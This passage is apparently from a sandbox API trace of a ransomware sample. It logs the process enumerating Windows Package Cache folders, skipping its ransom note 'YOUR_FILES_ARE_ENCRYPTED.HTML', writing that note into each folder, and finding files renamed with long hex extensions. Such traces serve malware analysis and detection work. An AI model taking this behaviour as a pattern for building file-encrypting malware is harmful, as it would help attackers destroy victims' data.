Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" [0110.524] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*" [0110.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c905d7a, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c905d7a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaff788e9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3b96, dwReserved1=0x6f3ae8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.524] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c905d7a, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c905d7a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaff788e9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3b96, dwReserved1=0x6f3ae8, cFileName="..", cAlternateFileName="")) returned 1 [0110.524] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c905d7a, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb0126176, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0126176, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3b96, dwReserved1=0x6f3ae8, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0110.525] StrStrIW (lpFirst="vcRuntimeMinimum_amd64", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.525] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned 118 [0110.525] GetProcessHeap () returned 0x600000 [0110.525] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.526] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" [0110.526] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*" [0110.526] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c905d7a, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb0126176, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0126176, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63b458, dwReserved1=0x6f3af0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.526] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c905d7a, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb0126176, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0126176, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63b458, dwReserved1=0x6f3af0, cFileName="..", cAlternateFileName="")) returned 1 [0110.526] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb519600, ftCreationTime.dwHighDateTime=0x1cf3e1d, ftLastAccessTime.dwLowDateTime=0xeb519600, ftLastAccessTime.dwHighDateTime=0x1cf3e1d, ftLastWriteTime.dwLowDateTime=0xb016d85e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xfc90a, dwReserved0=0x63b458, dwReserved1=0x6f3af0, cFileName="cab1.cab.543182C5B310AABCBB8805B614E14164430CAA1DA63D19B807CEB35AE10DE67B", cAlternateFileName="CAB1CA~1.543")) returned 1 [0110.526] StrStrIW (lpFirst="cab1.cab.543182C5B310AABCBB8805B614E14164430CAA1DA63D19B807CEB35AE10DE67B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.526] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.543182C5B310AABCBB8805B614E14164430CAA1DA63D19B807CEB35AE10DE67B") returned 192 [0110.526] PathFindExtensionW (pszPath="cab1.cab.543182C5B310AABCBB8805B614E14164430CAA1DA63D19B807CEB35AE10DE67B") returned=".543182C5B310AABCBB8805B614E14164430CAA1DA63D19B807CEB35AE10DE67B" [0110.526] lstrlenW (lpString=".543182C5B310AABCBB8805B614E14164430CAA1DA63D19B807CEB35AE10DE67B") returned 65 [0110.526] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea206900, ftCreationTime.dwHighDateTime=0x1cf3e1d, ftLastAccessTime.dwLowDateTime=0xea206900, ftLastAccessTime.dwHighDateTime=0x1cf3e1d, ftLastWriteTime.dwLowDateTime=0xea206900, ftLastWriteTime.dwHighDateTime=0x1cf3e1d, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x63b458, dwReserved1=0x6f3af0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0110.526] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.526] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 144 [0110.526] PathFindExtensionW (pszPath="vc_runtimeMinimum_x64.msi") returned=".msi" [0110.526] lstrlenW (lpString=".msi") returned 4 [0110.526] PathFindExtensionW (pszPath="vc_runtimeMinimum_x64.msi") returned=".msi" [0110.526] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaff67695, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaff67695, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaff760da, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63b458, dwReserved1=0x6f3af0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.526] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaff67695, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaff67695, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaff760da, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63b458, dwReserved1=0x6f3af0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.526] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.526] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 148 [0110.527] GetProcessHeap () returned 0x600000 [0110.527] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.527] GetProcessHeap () returned 0x600000 [0110.527] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.527] GetProcessHeap () returned 0x600000 [0110.527] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.528] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaff788e9, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaff788e9, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaff7d6ac, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f3b96, dwReserved1=0x6f3ae8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.528] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaff788e9, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaff788e9, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaff7d6ac, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f3b96, dwReserved1=0x6f3ae8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.528] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.528] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0110.528] GetProcessHeap () returned 0x600000 [0110.528] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.528] GetProcessHeap () returned 0x600000 [0110.529] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.529] GetProcessHeap () returned 0x600000 [0110.529] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.529] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaff837ff, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaff837ff, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaff872c9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.529] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaff837ff, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaff837ff, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaff872c9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.529] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.529] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0110.529] GetProcessHeap () returned 0x600000 [0110.529] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.530] GetProcessHeap () returned 0x600000 [0110.530] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.530] GetProcessHeap () returned 0x600000 [0110.530] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.531] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c0dea, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388c34a7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388c34a7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", cAlternateFileName="{B1755~1.610")) returned 1 [0110.531] StrStrIW (lpFirst="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.531] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned 86 [0110.531] GetProcessHeap () returned 0x600000 [0110.531] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.532] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" [0110.532] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*" [0110.532] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c0dea, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388c34a7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb01b1464, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.532] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c0dea, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388c34a7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb01b1464, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.532] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c34a7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388c34a7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x388c34a7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="packages", cAlternateFileName="")) returned 1 [0110.532] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.532] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned 95 [0110.532] GetProcessHeap () returned 0x600000 [0110.532] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.533] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" [0110.533] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*" [0110.533] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c34a7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388c34a7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb01a784c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4196, dwReserved1=0x6f40e8, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0110.533] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c34a7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x388c34a7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb01a784c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4196, dwReserved1=0x6f40e8, cFileName="..", cAlternateFileName="")) returned 1 [0110.533] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c34a7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb01cae69, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb01cae69, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4196, dwReserved1=0x6f40e8, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0110.533] StrStrIW (lpFirst="vcRuntimeAdditional_x86", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.533] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned 119 [0110.533] GetProcessHeap () returned 0x600000 [0110.533] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.534] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" [0110.534] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*" [0110.534] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c34a7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb01cae69, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb01cae69, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63b6c8, dwReserved1=0x6f40f0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.534] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388c34a7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb01cae69, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb01cae69, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63b6c8, dwReserved1=0x6f40f0, cFileName="..", cAlternateFileName="")) returned 1 [0110.534] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa960e00, ftCreationTime.dwHighDateTime=0x1ced524, ftLastAccessTime.dwLowDateTime=0xfa960e00, ftLastAccessTime.dwHighDateTime=0x1ced524, ftLastWriteTime.dwLowDateTime=0xb0461be0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x4ea418, dwReserved0=0x63b6c8, dwReserved1=0x6f40f0, cFileName="cab1.cab.E5B0EC829362A8A7929D2E88C163B79FC4E0F0E3F6630F06E2DD2EF16D672146", cAlternateFileName="CAB1CA~1.E5B")) returned 1 [0110.534] StrStrIW (lpFirst="cab1.cab.E5B0EC829362A8A7929D2E88C163B79FC4E0F0E3F6630F06E2DD2EF16D672146", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.534] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 